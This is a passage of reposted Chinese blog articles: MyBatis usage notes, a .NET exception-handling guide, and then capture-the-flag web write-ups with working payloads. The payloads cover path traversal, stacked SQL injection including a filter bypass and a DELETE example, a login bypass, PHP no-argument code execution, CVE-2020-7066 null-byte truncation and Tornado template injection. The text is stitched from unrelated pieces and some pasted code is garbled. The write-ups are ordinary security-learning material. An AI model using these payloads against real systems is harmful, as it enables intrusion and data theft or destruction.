list.size>0” 返回数据类型为Map只能接收一条记录,字段为键名,字段值为值,但通常是用实体类接收,或是使用注解@MapKey来进行每条记录的映射,效果等同于List用Stream流转Map foreach遍历list collection=“list” item=“vo” separator="," open="(" close=")"> {vo.id} foreach遍历map collection=“map” index=“key” item=“value”,{key}获取建,{value}获取值,$亦可 collection=“map.entrySet()” index=“key” item=“value”,同上 collection=“map.keys” item=“key”,{key}为键 不要使用where 1=1,使用动态where拼接,会自动剔除where后多余的and和or 单个参数时无论基本和引用并且未使用在动态SQL可以不加参数注解@Param,但一旦参数大于一个或者参数在动态SQL中使用就必须加@Param 并不是直接把参数加引号,而是变成?的形式交给prepareStatement处理,$直接使用值,当ORDER BY诸如此类不需要加引号的参数时,使用$代替,但为避免sql注入,该参数不能交由用户控制 Plus 官方API https://baomidou.com/guide/ @TableName 表名 @TableField(strategy = FieldStrategy.IGNORED) 更新不会忽略NULL值 @TableField(exist = false)表明该字段非数据字段,否则新增更新会报错 MybatisPlus对于单表的操作还是非常优秀的,在对单表进行新增或者更新的时候经常使用,但对于单表的查询业务上很少出现仅仅查询一张表的情况,但也会有,如果条件不大于3个还是可以使用的,多了倒没有直接写SQL来的方便了 MybatisPlus的批量插入也是通过for循环插入的,还是建议使用Mybatis的动态foreach进行批量插入 MybatisPlus的分页器会对方法中的参数判断,如果存在分页对象就先查询总数看是否大于0,然后拼接当前的数据库limit语句,所以如果我们分页对象为null,就可以实现不分页查询 Object paramObj = boundSql.getParameterObject();IPage page = null;if (paramObj instanceof IPage) { ……public static String getOriginalCountSql(String originalSql) {return String.format("SELECT COUNT(1) FROM ( %s ) TOTAL", originalSql);} ……originalSql = DialectFactory.buildPaginationSql(page, buildSql, dbType, this.dialectClazz); ……public String buildPaginationSql(String originalSql, long offset, long limit) {StringBuilder sql = new StringBuilder(originalSql);sql.append(" LIMIT ").append(offset).append(",").append(limit);return sql.toString();} IDEA 插件 Lombok : 快速生成getter、setter等 Alibaba Java Coding Guidelines :阿里规约扫描 Rainbow Brackets :彩色括号 HighlightBracketPair :高亮提示 MyBatisX :mabatisPlus提供的xml和mapper转换的插件,小鸟图标 CamelCase :大小写、驼峰、下划线、中划线转换插件 使用shift+Alt+u进行转换(很方便) 可以在Editor中设置CamelCase的转换,一般只保留下划线和驼峰两种 String Manipulation :字符串工具(未使用) RestfulToolkit http :Restful请求工具 打开idea,在右侧边栏会有一个标签(RestServices),打开可以看到里面是url路径 ctrl+\或者ctrl+alt+n会检索路径 Ctrl + Enter格式化json 没有记忆功能,也不能加token,只是查找请求路径使用 easycode :代码生成工具(个人觉得很好用,常用于生成实体类) 支持自定义模板 支持添加自定义列,不影响数据库 支持多表同时生成 支持自定义类型映射 支持配置导入导出 支持动态调试 支持自定义属性 Power Mode 11 :打字特效(纯属装逼) Nyan Progress Bar :漂亮的进度条(纯属装逼) Other Vo:数据持久化模型 Query:数据查询模型 Dto:数据传输模型 本篇文章为转载内容。原文链接:https://blog.csdn.net/qq_40910781/article/details/111416185。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-05-26 23:30:52
268
转载
转载文章
...处理异常?你可能已经使用异常一段时间了,但对 .NET/C 的异常机制依然有一些疑惑。那么,可以阅读本文。 本文适用于已经入门 .NET/C 开发,已经开始在实践中抛出和捕获异常,但是对 .NET 异常机制的用法以及原则比较模糊的小伙伴。通过阅读本文,小伙伴们可以迅速在项目中使用比较推荐的异常处理原则来处理异常。 本文内容 快速了解 .NET 的异常机制 Exception 类 捕捉异常 引发异常 创建自定义异常 finally 异常堆栈跟踪 异常处理原则 try-catch-finally 该不该引发异常? 该不该捕获异常? 应用程序全局处理异常 抛出哪些异常? 异常的分类 其他 一些常见异常的原因和解决方法 AccessViolationException 快速了解 .NET 的异常机制 Exception 类 我们大多数小伙伴可能更多的使用 Exception 的类型、Message 属性、StackTrace 以及内部异常来定位问题,但其实 Exception 类型还有更多的信息可以用于辅助定位问题。 Message 用来描述异常原因的详细信息 如果你捕捉到了异常,一般使用这段描述能知道发生的大致原因。 如果你准备抛出异常,在这个信息里面记录能帮助调试问题的详细文字信息。 StackTrace 包含用来确定错误位置的堆栈跟踪(当有调试信息如 PDB 时,这里就会包含源代码文件名和源代码行号) InnerException 包含内部异常信息 Source 这个属性包含导致错误的应用程序或对象的名称 Data 这是一个字典,可以存放基于键值的任意数据,帮助在异常信息中获得更多可以用于调试的数据 HelpLink 这是一个 url,这个 url 里可以提供大量用于说明此异常原因的信息 如果你自己写一个自定义异常类,那么你可以在自定义的异常类中记录更多的信息。然而大多数情况下我们都考虑使用 .NET 中自带的异常类,因此可以充分利用 Exception 类中的已有属性在特殊情况下报告更详细的利于调试的异常信息。 捕捉异常 捕捉异常的基本语法是: try{// 可能引发异常的代码。}catch (FileNotFoundException ex){// 处理一种类型的异常。}catch (IOException ex){// 处理另一种类的异常。} 除此之外,还有 when 关键字用于筛选异常: try{// 可能引发异常的代码。}catch (FileNotFoundException ex) when (Path.GetExtension(ex.FileName) is ".png"){// 处理一种类型的异常,并且此文件扩展名为 .png。}catch (FileNotFoundException ex){// 处理一种类型的异常。} 无论是否有带 when 关键字,都是前面的 catch 块匹配的时候执行匹配的 catch 块而无视后面可能也匹配的 catch 块。 如果 when 块中抛出异常,那么此异常将被忽略,when 中的表达式值视为 false。有个但是,请看:.NET Framework 的 bug?try-catch-when 中如果 when 语句抛出异常,程序将彻底崩溃 - walterlv。 引发异常 引发异常使用 throw 关键字。只是注意如果要重新抛出异常,请使用 throw; 语句或者将原有异常作为内部异常。 创建自定义异常 如果你只是随便在业务上创建一个异常,那么写一个类继承自 Exception 即可: public class MyCustomException : Exception{public string MyCustomProperty { get; }public MyCustomException(string customProperty) => MyCustomProperty = customProperty;} 不过,如果你需要写一些比较通用抽象的异常(用于被继承),或者在底层组件代码中写自定义异常,那么就建议考虑写全异常的所有构造函数,并且加上可序列化: [Serializable]public class InvalidDepartmentException : Exception{public InvalidDepartmentException() : base() { }public InvalidDepartmentException(string message) : base(message) { }public InvalidDepartmentException(string message, Exception innerException) : base(message, innerException) { }// 如果异常需要跨应用程序域、跨进程或者跨计算机抛出,就需要能被序列化。protected InvalidDepartmentException(SerializationInfo info, StreamingContext context) : base(info, context) { } } 在创建自定义异常的时候,建议: 名称以 Exception 结尾 Message 属性的值是一个句子,用于描述异常发生的原因。 提供帮助诊断错误的属性。 尽量写全四个构造函数,前三个方便使用,最后一个用于序列化异常(新的异常类应可序列化)。 finally 异常堆栈跟踪 堆栈跟踪从引发异常的语句开始,到捕获异常的 catch 语句结束。 利用这一点,你可以迅速找到引发异常的那个方法,也能找到是哪个方法中的 catch 捕捉到的这个异常。 异常处理原则 try-catch-finally 我们第一个要了解的异常处理原则是——明确 try catch finally 的用途! try 块中,编写可能会发生异常的代码。 最好的情况是,你只将可能会发生异常的代码放到 try 块中,当然实际应用的时候可能会需要额外放入一些相关代码。但是如果你将多个可能发生异常的代码放到一个 try 块中,那么将来定位问题的时候你就会很抓狂(尤其是多个异常还是一个类别的时候)。 catch 块的作用是用来 “恢复错误” 的,是用来 “恢复错误” 的,是用来 “恢复错误” 的。 如果你在 try 块中先更改了类的状态,随后出了异常,那么最好能将状态改回来——这可以避免这个类型或者应用程序的其他状态出现不一致——这很容易造成应用程序“雪崩”。举一个例子:我们写一个程序有简洁模式和专业模式,在从简洁模式切换到专业模式的时候,我们设置 IsProfessionalMode 为 true,但随后出现了异常导致没有成功切换为专业模式;然而接下来所有的代码在执行时都判断 IsProfessionalMode 为 true 状态不正确,于是执行了一些非预期的操作,甚至可能用到了很多专业模式中才会初始化的类型实例(然而没有完成初始化),产生大量的额外异常;我们说程序雪崩了,多数功能再也无法正常使用了。 当然如果任务已全部完成,仅仅在对外通知的时候出现了异常,那么这个时候不需要恢复状态,因为实际上已经完成了任务。 你可能会有些担心如果我没有任何手段可以恢复错误怎么办?那这个时候就不要处理异常!——如果不知道如何恢复错误,请不要处理异常!让异常交给更上一层的模块处理,或者交给整个应用程序全局异常处理模块进行统一处理(这个后面会讲到)。 另外,异常不能用于在正常执行过程中更改程序的流程。异常只能用于报告和处理错误条件。 finally 块的作用是清理资源。 虽然 .NET 的垃圾回收机制可以在回收类型实例的时候帮助我们回收托管资源(例如 FileStream 类打开的文件),但那个时机不可控。因此我们需要在 finally 块中确保资源可被回收,这样当重新使用这个文件的时候能够立刻使用而不会被占用。 一段异常处理代码中可能没有 catch 块而有 finally 块,这个时候的重点是清理资源,通常也不知道如何正确处理这个错误。 一段异常处理代码中也可能 try 块留空,而只在 finally 里面写代码,这是为了“线程终止”安全考虑。在 .NET Core 中由于不支持线程终止因此可以不用这么写。详情可以参考:.NET/C 异常处理:写一个空的 try 块代码,而把重要代码写到 finally 中(Constrained Execution Regions) - walterlv。 该不该引发异常? 什么情况下该引发异常?答案是——这真的是一个异常情况! 于是,我们可能需要知道什么是“异常情况”。 一个可以参考的判断方法是——判断这件事发生的频率: 如果这件事并不常见,当它发生时确实代表发生了一个错误,那么这件事情就可以认为是异常。 如果这件事经常发生,代码中正常情况就应该处理这件事情,那么这件事情就不应该被认为是异常(而是正常流程的一部分)。 例如这些情况都应该认为是异常: 方法中某个参数不应该传入 null 时但传入了 null 这是开发者使用这个方法时没有遵循此方法的契约导致的,让开发者改变调用此方法的代码就可以完全避免这件事情发生 而下面这些情况则不应该认为是异常: 用户输入了一串字符,你需要将这串字符转换为数字 用户输入的内容本身就千奇百怪,出现非数字的输入再正常不过了,对非数字的处理本就应该成为正常流程的一部分 对于这些不应该认为是异常的情况,编写的代码就应该尽可能避免异常。 有两种方法来避免异常: 先判断再使用。 例如读取文件之前,先判断文件是否存在;例如读取文件流时先判断是否已到达文件末尾。 如果提前判断的成本过高,可采用 TryDo 模式来完成,例如字符串转数字中的 TryParse 方法,字典中的 TryGetValue 方法。 对极为常见的错误案例返回 null(或默认值),而不是引发异常。极其常见的错误案例可被视为常规控制流。通过在这些情况下返回 NULL(或默认值),可最大程度地减小对应用的性能产生的影响。(后面会专门说 null) 而当存在下列一种或多种情况时,应引发异常: 方法无法完成其定义的功能。 根据对象的状态,对某个对象进行不适当的调用。 请勿有意从自己的源代码中引发 System.Exception、System.SystemException、System.NullReferenceException 或 System.IndexOutOfRangeException。 该不该捕获异常? 在前面 try-catch-finally 小节中,我们提到了 catch 块中应该写哪些代码,那里其实已经说明了哪些情况下应该处理异常,哪些情况下不应该处理异常。一句总结性的话是——如果知道如何从错误中恢复,那么就捕获并处理异常,否则交给更上层的业务去捕获异常;如果所有层都不知道如何处理异常,就交给全局异常处理模块进行处理。 应用程序全局处理异常 对于 .NET 程序,无论是 .NET Framework 还是 .NET Core,都有下面这三个可以全局处理的异常。这三个都是事件,可以自行监听。 AppDomain.UnhandledException 应用程序域未处理的异常,任何线程中未处理掉的异常都会进入此事件中 当这里能够收到事件,意味着应用程序现在频临崩溃的边缘(从设计上讲,都到这里了,也再没有任何代码能够使得程序从错误中恢复了) 不过也可以配置 legacyUnhandledExceptionPolicy 防止后台线程抛出的异常让程序崩溃退出 建议在这个事件中记录崩溃日志,然后对应用程序进行最后的拯救恢复操作(例如保存用户的文档数据) AppDomain.FirstChanceException 应用程序域中的第一次机会异常 我们前面说过,一个异常被捕获时,其堆栈信息将包含从 throw 块到 catch 块之间的所有帧,而在第一次机会异常事件中,只是刚刚 throw 出来,还没有被任何 catch 块捕捉,因此在这个事件中堆栈信息永远只会包含一帧(不过可以稍微变通一下在第一次机会异常 FirstChanceException 中获取比较完整的异常堆栈) 注意第一次机会异常事件即便异常会被 catch 也会引发,因为它引发在 catch 之前 不要认为异常已经被 catch 就万事大吉可以无视这个事件了。前面我们说过异常仅在真的是异常的情况才应该引发,因此如果这个事件中引发了异常,通常也真的意味着发生了错误(差别只是我们能否从错误中恢复而已)。如果你经常在正常的操作中发现可以通过此事件监听到第一次机会异常,那么一定是应用程序或框架中的异常设计出了问题(可能把正常应该处理的流程当作了异常,可能内部实现代码错误,可能出现了使用错误),这种情况一定是要改代码修 Bug 的。而一些被认为是异常的情况下收到此事件则是正常的。 TaskScheduler.UnobservedTaskException 在使用 async / await 关键字编写异步代码的时候,如果一直有 await 传递,那么异常始终可以被处理到;但中间有异步任务没有 await 导致异常没有被传递的时候,就会引发此事件。 如果在此事件中监听到异常,通常意味着代码中出现了不正确的 async / await 的使用(要么应该修改实现避免异常,要么应该正确处理异常并从中恢复错误) 对于 GUI 应用程序,还可以监听 UI 线程上专属的全局异常: WPF:Application.DispatcherUnhandledException 或者 Dispatcher.UnhandledException Windows Forms:Application.ThreadException 关于这些全局异常的处理方式和示例代码,可以参阅博客: WPF UnhandledException - Iron 的博客 - CSDN博客 抛出哪些异常? 任何情况下都不应该抛出这些异常: 过于抽象,以至于无法表明其含义 Exception 这可是顶级基类,这都抛出来了,使用者再也无法正确地处理此异常了 SystemException 这是各种异常的基类,本身并没有明确的意义 ApplicationException 这是各种异常的基类,本身并没有明确的意义 由 CLR 引发的异常 NullReferenceException 试图在空引用上执行某些方法,除了告诉实现者出现了意料之外的 null 之外,没有什么其它价值了 IndexOutOfRangeException 使用索引的时候超出了边界 InvalidCastException 表示试图对某个类型进行强转但类型不匹配 StackOverflow 表示栈溢出,这通常说明实现代码的时候写了不正确的显式或隐式的递归 OutOfMemoryException 表示托管堆中已无法分出期望的内存空间,或程序已经没有更多内存可用了 AccessViolationException 这说明使用非托管内存时发生了错误 BadImageFormatException 这说明了加载的 dll 并不是期望中的托管 dll TypeLoadException 表示类型初始化的时候发生了错误 .NET 设计失误 FormatException 因为当它抛出来时无法准确描述到底什么错了 首先是你自己不应该抛出这样的异常。其次,你如果在运行中捕获到了上面这些异常,那么代码一定是写得有问题。 如果是捕获到了上面 CLR 的异常,那么有两种可能: 你的代码编写错误(例如本该判空的代码没有判空,又如索引数组超出界限) 你使用到的别人写的代码编写错误(那你就需要找到它改正,或者如果开源就去开源社区中修复吧) 而一旦捕获到了上面其他种类的异常,那就找到抛这个异常的人,然后对它一帧狂扁即可。 其他的异常则是可以抛出的,只要你可以准确地表明错误原因。 另外,尽量不要考虑抛出聚合异常 AggregateException,而是优先使用 ExceptionDispatchInfo 抛出其内部异常。详见:使用 ExceptionDispatchInfo 捕捉并重新抛出异常 - walterlv。 异常的分类 在 该不该引发异常 小节中我们说到一个异常会被引发,是因为某个方法声称的任务没有成功完成(失败),而失败的原因有四种: 方法的使用者用错了(没有按照方法的契约使用) 方法的执行代码写错了 方法执行时所在的环境不符合预期 简单说来,就是:使用错误,实现错误、环境错误。 使用错误: ArgumentException 表示参数使用错了 ArgumentNullException 表示参数不应该传入 null ArgumentOutOfRangeException 表示参数中的序号超出了范围 InvalidEnumArgumentException 表示参数中的枚举值不正确 InvalidOperationException 表示当前状态下不允许进行此操作(也就是说存在着允许进行此操作的另一种状态) ObjectDisposedException 表示对象已经 Dispose 过了,不能再使用了 NotSupportedException 表示不支持进行此操作(这是在说不要再试图对这种类型的对象调用此方法了,不支持) PlatformNotSupportedException 表示在此平台下不支持(如果程序跨平台的话) NotImplementedException 表示此功能尚在开发中,暂时请勿使用 实现错误: 前面由 CLR 抛出的异常代码主要都是实现错误 NullReferenceException 试图在空引用上执行某些方法,除了告诉实现者出现了意料之外的 null 之外,没有什么其它价值了 IndexOutOfRangeException 使用索引的时候超出了边界 InvalidCastException 表示试图对某个类型进行强转但类型不匹配 StackOverflow 表示栈溢出,这通常说明实现代码的时候写了不正确的显式或隐式的递归 OutOfMemoryException 表示托管堆中已无法分出期望的内存空间,或程序已经没有更多内存可用了 AccessViolationException 这说明使用非托管内存时发生了错误 BadImageFormatException 这说明了加载的 dll 并不是期望中的托管 dll TypeLoadException 表示类型初始化的时候发生了错误 环境错误: IOException 下的各种子类 Win32Exception 下的各种子类 …… 另外,还剩下一些不应该抛出的异常,例如过于抽象的异常和已经过时的异常,这在前面一小结中有说明。 其他 一些常见异常的原因和解决方法 在平时的开发当中,你可能会遇到这样一些异常,它不像是自己代码中抛出的那些常见的异常,但也不包含我们自己的异常堆栈。 这里介绍一些常见这些异常的原因和解决办法。 AccessViolationException 当出现此异常时,说明非托管内存中发生了错误。如果要解决问题,需要从非托管代码中着手调查。 这个异常是访问了不允许的内存时引发的。在原因上会类似于托管中的 NullReferenceException。 参考资料 Handling and throwing exceptions in .NET - Microsoft Docs Exceptions and Exception Handling - C Programming Guide - Microsoft Docs 我的博客会首发于 https://blog.walterlv.com/,而 CSDN 会从其中精选发布,但是一旦发布了就很少更新。 如果在博客看到有任何不懂的内容,欢迎交流。我搭建了 dotnet 职业技术学院 欢迎大家加入。 本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可。欢迎转载、使用、重新发布,但务必保留文章署名吕毅(包含链接:https://walterlv.blog.csdn.net/),不得用于商业目的,基于本文修改后的作品务必以相同的许可发布。如有任何疑问,请与我联系。 本篇文章为转载内容。原文链接:https://blog.csdn.net/WPwalter/article/details/94610764。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-04-13 13:38:26
59
转载
转载文章
...r( //返回中文字符串的一部分$page,0,mb_strpos($page . '?', '?') //我们输入flag 但其实它在你的字符串后面加了一个问号,然后返回问号的位置,就是=4//所以想绕过这里,直接?flag,他检测到的问号就是0,然后0,0没有执行 就绕过了);if (in_array($_page, $whitelist)) { //检测是不是在白名单/hint.php?flag 进行绕过 进行目录穿越就可以了return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }//上面是定义了一个类if (! empty($_REQUEST['file']) //如果变量不存在的话,empty()并不会产生警告。 && is_string($_REQUEST['file']) //必须是字符串&& emmm::checkFile($_REQUEST['file']) //上面的那个类) {include $_REQUEST['file']; //就包含这个文件 参数也就是fileexit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 所以 最后就是 这样 ?file=hint.php?../../../../../../../../ffffllllaaaagggg 就得到了flag flag{acbbba26-c81b-4603-bcb7-25f78adeab18} [强网杯 2019]随便注 进入题目链接 1.输入:1' 查看注入类型 所以他的sql语句是单引号过滤 2.查看字段 (为2) 1' order by 2 3.显示回显 1' union select 1,2 相当于告诉了我们它的过滤 尝试用堆叠查询试试了 4.查库 1;show database(); 5.查表 1';show tables; 所以是有两个表 1919810931114514 words 6.查列 1';show columns from words; 表名words需要被 这个符号包起来,这个符号是 esc下面一个的按键,这个符号在mysql里 用于 分割其他命令,表示此为(表名、字段名) 1';show columns from 1919810931114514; 看到flag了!!! 那么如何查询到数据呢? select 函数被过滤了,其实mysql的函数有很多 这里通过 MYSQL的预处理语句,使用 : concat('s','elect',' from 1919810931114514') 完成绕过 构造pyload: 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字,字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回,一种是空白,一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母(除过滤的关键词外)都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符,不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接,但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式:pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接,而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候,mysql也可以把 || 作为字符串拼接。 修改完后,|| 就会被认为是字符串拼接符 MySQL中sql_mode参数,具体的看这里 解题思路1: payload:,1 查询语句:select ,1||flag from Flag 解题思路2: 堆叠注入,使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析: 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式:pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入:1’ 为'闭合 2.看字段:1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ,太像了,增加了过滤规则。 修改表名和set均不可用,所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据,也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了:cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点: cve-2020-7066利用 老套路:先F12查看源码 发现提示:Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾,这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点: .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素,并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节,看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");} }else{die("再好好想想!");} }else{die("还想读flag,臭弟弟!");} }// highlight_file(__FILE__);?> 既然getshell基本不可能,那么考虑读源码 看源码,flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件,例如: <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数: localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点: current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步:读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数,此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由,就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的,参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的,名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象,hexdigest()是获得加密后的16进制字符串 urllib.unquote() 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog,且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了:secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为:fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入: /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目: 1.tornado是一个python的模板,可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息,想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞,尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 